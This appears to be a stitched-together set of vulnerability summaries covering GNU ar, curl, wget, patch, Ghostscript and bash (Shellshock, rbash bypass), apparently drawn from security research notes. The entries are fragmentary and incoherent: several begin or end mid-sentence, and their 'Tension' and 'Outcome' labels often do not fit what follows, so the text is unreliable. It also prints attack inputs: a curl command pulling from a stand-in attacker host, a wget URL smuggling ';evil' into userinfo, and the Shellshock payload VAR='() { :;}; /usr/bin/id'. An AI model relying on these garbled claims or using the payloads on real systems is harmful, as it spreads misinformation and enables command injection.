archive member extraction writes to a path chosen earlier in the extraction flow and then applies chmod() to that pathname after closing the file — GNU binutils ar. Tension: The path is not revalidated at the metadata-update stage, so a race or path swap in a writable directory can redirect the chmod/time-setting operations to an attacker-chosen target. Outcome: The code also uses a separately tracked global output_filename and reopens/updates metadata by name.

Raw source code is being exposed through the Debugger Network tab via a `_N_E` server that serves per-page artifacts (likely source maps), including in production.

Outcome: upWriteComponentCommands, upYMoveCommand) and passes them DIRECTLY as the format string argument to gp_fprintf and gs_snprintf inside upd_wrtrtl (lines 7021, 7028, 7049, 7053) and similar writer functions.

Outcome: CVE-2018-1000156's get_ed_command_letter() filter only constrained which ed commands were forwarded; it did NOT sanitize the filename interpolated into popen.

curl -OJi http://attacker/path — when a victim runs. Tension: -i defeats that protection because it forces the output stream to be created before any Content-Disposition is parsed. Outcome: the early creation path leaves outs->is_cd_filename = FALSE.

wget -d 'http://user;evil@example.com/' will attempt to resolve 'user;evil@example.com' instead of 'example.com'. Tension: RFC 2396 explicitly allows ';' as a valid character inside the userinfo component. Outcome: This is CVE-2024-38428, fixed in wget 1.24.5.

bash initializes, initialize_shell_variables() in variables.c imports function definitions from environment variables — When bash initializes. Outcome: An attacker can append arbitrary shell commands after the closing brace, e.g., VAR='() { :;}; /usr/bin/id', and they will be executed.

Bash <= 5.0 restricted shell (rbash). Tension: The forked subshell that interprets the script therefore runs WITHOUT rbash restrictions: PATH/SHELL/ENV become writable, slashes in command names are allowed, exec/cd/redirection work, etc. Outcome: Bug class: restricted-bypass.
